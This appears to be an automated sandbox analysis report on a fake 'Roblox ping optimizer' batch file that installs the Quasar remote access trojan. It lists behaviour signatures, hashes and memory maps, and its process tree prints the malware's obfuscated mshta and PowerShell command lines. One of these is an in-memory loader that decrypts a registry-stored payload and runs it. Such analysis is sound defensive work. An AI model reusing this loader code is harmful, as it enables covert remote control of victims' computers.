Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 22:17

General

  • Target

    RobloxPingOptimizer-Main-x64.NEW/RobloxPingOptimizer-Main-x64/Main/RobloxPingOptimizer.bat

  • Size

    15.6MB

  • MD5

    0e7fa38a2267f6c3c8b0afafda56ef99

  • SHA1

    e116a71ae311011f1fc2697e84575990b75d96b4

  • SHA256

    30800e9982e73ce9a2f315b05630225f57b6ae1d219902b8dcde6031d840a553

  • SHA512

    75f5108166ac7224f5797941f57ada798a1bb760850677618770fb4aa7c9dd3d9298013afde66a0eba303852c9dfb2277b8bda61243c161b35975f1030ed9e98

  • SSDEEP

    49152:Cdxc9riM4QO4C2ltO7iHK35ROUcdDvgVNfLH9QDn7OusKIV+cDBGVKKjU5ECeNNI:k

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 11 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:672
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:944
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:436
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:864
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1084
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1092
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1116
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2632
                    • C:\Windows\$sxr-mshta.exe
                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ywMXwfUBFNVJyDSrBIVk4312:skAokGYA=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious use of WriteProcessMemory
                      PID:1972
                      • C:\Windows\$sxr-cmd.exe
                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-ywMXwfUBFNVJyDSrBIVk4312:skAokGYA=%
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3532
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:ynDiyxywMz; "
                          4⤵
                            PID:2796
                          • C:\Windows\$sxr-powershell.exe
                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:832
                            • C:\Windows\$sxr-cmd.exe
                              "C:\Windows\$sxr-cmd.exe" /C set "WjUGhUhFAD=[System.Diagnostics.Process]::GetProcessById(832).WaitForExit();[System.Threading.Thread]::Sleep(5000); function RehQj($pAibt){ $vPowE=[System.Security.Cryptography.Aes]::Create(); $vPowE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vPowE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vPowE.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('G2RKZtcN6hkpnZXTVc3gUkD6zkZNhu+HP2nFGziH5go='); $vPowE.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('SDEeaycnJbFS9015ocCOJw=='); $ntIWU=$vPowE.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $pliUW=$ntIWU.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($pAibt, 0, $pAibt.Length); $ntIWU.Dispose(); $vPowE.Dispose(); $pliUW;}function DexhB($pAibt){ $sVDkh=New-Object System.IO.MemoryStream(,$pAibt); $yryyb=New-Object System.IO.MemoryStream; Invoke-Expression '$ntNJv @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$sVDkh,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $ntNJv.CopyTo($yryyb); $ntNJv.Dispose(); $sVDkh.Dispose(); $yryyb.Dispose(); $yryyb.ToArray();}function KktQw($pAibt){ $pliUW = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($pAibt); $pliUW = RehQj($pliUW); $pliUW = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($pliUW); return $pliUW;}function execute_function($pAibt,$wEKyT){ $zjWEW = @( '$jvvcj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$pAibt);'.Replace('@', ''), '$cDqzB = $jvvcj.EntryPoint;', '$cDqzB.Invoke($null, $wEKyT);' ); foreach ($dJqQg in $zjWEW) { Invoke-Expression $dJqQg };}$JmHSu = KktQw('y11/dHJtjD3vwONFotaskg==');$Ymipw = KktQw('Wn6/WQPtP/S46okRUKjRC+GzKvWL1VezdUredriacfw=');$vcgus = KktQw('punO0rRR5cl9FpY6wXYKog==');$ulSUs = KktQw('SE1EhvXe93ZAgL1pCIjykQ==');if (@(get-process -ea silentlycontinue $ulSUs).count -gt 1) {exit};$UGypJ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($JmHSu).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($Ymipw);$VXpQb=DexhB (RehQj ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($UGypJ)));execute_function $VXpQb (,[string[]] ($vcgus));" & echo Invoke-Expression $env:WjUGhUhFAD; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
                              5⤵
                              • Executes dropped EXE
                              PID:4400
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:WjUGhUhFAD; "
                                6⤵
                                  PID:2316
                                • C:\Windows\$sxr-powershell.exe
                                  C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3876
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1212
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1248
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1340
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1412
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1448
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1468
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1488
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1656
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1676
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1736
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1812
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1824
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1940
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1992
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2004
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1712
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2084
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2252
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                                PID:2340
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2464
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2548
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2560
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2624
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                      1⤵
                                                                        PID:2692
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2752
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2776
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2812
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2844
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3120
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3388
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer-Main-x64.NEW\RobloxPingOptimizer-Main-x64\Main\RobloxPingOptimizer.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:908
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:LdjEKqpmmB; "
                                                                                      3⤵
                                                                                        PID:3728
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Deletes itself
                                                                                        • Drops file in Windows directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4156
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3460
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3596
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3852
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:628
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:1504
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4724
                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5044
                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4624
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:3164
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:2820
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:4864
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                      1⤵
                                                                                                        PID:5064
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:1460
                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          1⤵
                                                                                                            PID:2880
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                            1⤵
                                                                                                              PID:1796
                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4564

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                              Execution

                                                                                                              Command and Scripting Interpreter

                                                                                                              1
                                                                                                              T1059

                                                                                                              PowerShell

                                                                                                              1
                                                                                                              T1059.001

                                                                                                              Discovery

                                                                                                              Query Registry

                                                                                                              2
                                                                                                              T1012

                                                                                                              System Information Discovery

                                                                                                              2
                                                                                                              T1082

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                Filesize

                                                                                                                53KB

                                                                                                                MD5

                                                                                                                a26df49623eff12a70a93f649776dab7

                                                                                                                SHA1

                                                                                                                efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                SHA256

                                                                                                                4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                SHA512

                                                                                                                e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqlnj5pn.t4q.ps1
                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • C:\Windows\$sxr-cmd.exe
                                                                                                                Filesize

                                                                                                                283KB

                                                                                                                MD5

                                                                                                                8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                SHA1

                                                                                                                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                SHA256

                                                                                                                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                SHA512

                                                                                                                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                              • C:\Windows\$sxr-mshta.exe
                                                                                                                Filesize

                                                                                                                14KB

                                                                                                                MD5

                                                                                                                0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                SHA1

                                                                                                                51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                SHA256

                                                                                                                dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                SHA512

                                                                                                                d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                              • C:\Windows\$sxr-powershell.exe
                                                                                                                Filesize

                                                                                                                442KB

                                                                                                                MD5

                                                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                                                SHA1

                                                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                SHA256

                                                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                SHA512

                                                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                              • memory/436-116-0x000001FA01900000-0x000001FA01929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/436-122-0x00007FF9D6C50000-0x00007FF9D6C60000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/436-123-0x000001FA01900000-0x000001FA01929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/436-124-0x000001FA01900000-0x000001FA01929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/672-92-0x0000027163890000-0x00000271638B9000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/672-91-0x0000027163890000-0x00000271638B9000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/672-90-0x0000027163860000-0x0000027163883000-memory.dmp
                                                                                                                Filesize

                                                                                                                140KB

                                                                                                              • memory/672-100-0x0000027163890000-0x00000271638B9000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/672-99-0x0000027163890000-0x00000271638B9000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/672-98-0x00007FF9D6C50000-0x00007FF9D6C60000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/832-69-0x000002377C9B0000-0x000002377D056000-memory.dmp
                                                                                                                Filesize

                                                                                                                6.6MB

                                                                                                              • memory/832-83-0x000002377ECE0000-0x000002377ED22000-memory.dmp
                                                                                                                Filesize

                                                                                                                264KB

                                                                                                              • memory/832-783-0x000002377F200000-0x000002377F23C000-memory.dmp
                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/832-771-0x000002377F080000-0x000002377F122000-memory.dmp
                                                                                                                Filesize

                                                                                                                648KB

                                                                                                              • memory/832-770-0x000002377F420000-0x000002377F5E2000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.8MB

                                                                                                              • memory/832-768-0x000002377F140000-0x000002377F1F2000-memory.dmp
                                                                                                                Filesize

                                                                                                                712KB

                                                                                                              • memory/832-766-0x000002377F030000-0x000002377F080000-memory.dmp
                                                                                                                Filesize

                                                                                                                320KB

                                                                                                              • memory/832-73-0x0000023749C30000-0x0000023749C52000-memory.dmp
                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/832-72-0x00007FFA14CD0000-0x00007FFA14D8E000-memory.dmp
                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/832-75-0x0000023764280000-0x0000023764286000-memory.dmp
                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/832-76-0x000002377DAF0000-0x000002377E03E000-memory.dmp
                                                                                                                Filesize

                                                                                                                5.3MB

                                                                                                              • memory/832-77-0x000002377E040000-0x000002377E7EE000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/832-78-0x000002377E7F0000-0x000002377EB7C000-memory.dmp
                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                              • memory/832-71-0x00007FFA16BD0000-0x00007FFA16DC5000-memory.dmp
                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/832-70-0x000002377D060000-0x000002377D748000-memory.dmp
                                                                                                                Filesize

                                                                                                                6.9MB

                                                                                                              • memory/832-87-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                Filesize

                                                                                                                28KB

                                                                                                              • memory/832-74-0x0000023763FB0000-0x0000023763FB6000-memory.dmp
                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/832-82-0x000002377EC70000-0x000002377ECDA000-memory.dmp
                                                                                                                Filesize

                                                                                                                424KB

                                                                                                              • memory/832-79-0x000002377EB80000-0x000002377EC32000-memory.dmp
                                                                                                                Filesize

                                                                                                                712KB

                                                                                                              • memory/864-128-0x000002A7AE330000-0x000002A7AE359000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/864-136-0x000002A7AE330000-0x000002A7AE359000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/864-135-0x000002A7AE330000-0x000002A7AE359000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/864-134-0x00007FF9D6C50000-0x00007FF9D6C60000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/944-110-0x00007FF9D6C50000-0x00007FF9D6C60000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/944-104-0x0000024CE7900000-0x0000024CE7929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/944-112-0x0000024CE7900000-0x0000024CE7929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/944-111-0x0000024CE7900000-0x0000024CE7929000-memory.dmp
                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/4156-45-0x00007FF9F8713000-0x00007FF9F8715000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4156-38-0x000001FE624E0000-0x000001FE624E8000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4156-20-0x00007FF7DE000000-0x00007FF7DE071000-memory.dmp
                                                                                                                Filesize

                                                                                                                452KB

                                                                                                              • memory/4156-21-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-22-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-23-0x000001FE62320000-0x000001FE6241C000-memory.dmp
                                                                                                                Filesize

                                                                                                                1008KB

                                                                                                              • memory/4156-51-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-81-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-50-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-24-0x000001FE307E0000-0x000001FE30802000-memory.dmp
                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/4156-39-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                Filesize

                                                                                                                28KB

                                                                                                              • memory/4156-18-0x00007FFA16BD0000-0x00007FFA16DC5000-memory.dmp
                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4156-19-0x00007FFA14CD0000-0x00007FFA14D8E000-memory.dmp
                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/4156-17-0x000001FE61630000-0x000001FE6211C000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.9MB

                                                                                                              • memory/4156-16-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-15-0x000001FE60B80000-0x000001FE6162C000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.7MB

                                                                                                              • memory/4156-14-0x000001FE80010000-0x000001FE80086000-memory.dmp
                                                                                                                Filesize

                                                                                                                472KB

                                                                                                              • memory/4156-0-0x00007FF9F8713000-0x00007FF9F8715000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4156-36-0x000001FE632B0000-0x000001FE632DE000-memory.dmp
                                                                                                                Filesize

                                                                                                                184KB

                                                                                                              • memory/4156-13-0x000001FE7DEB0000-0x000001FE7DEF4000-memory.dmp
                                                                                                                Filesize

                                                                                                                272KB

                                                                                                              • memory/4156-11-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-34-0x000001FE63210000-0x000001FE63246000-memory.dmp
                                                                                                                Filesize

                                                                                                                216KB

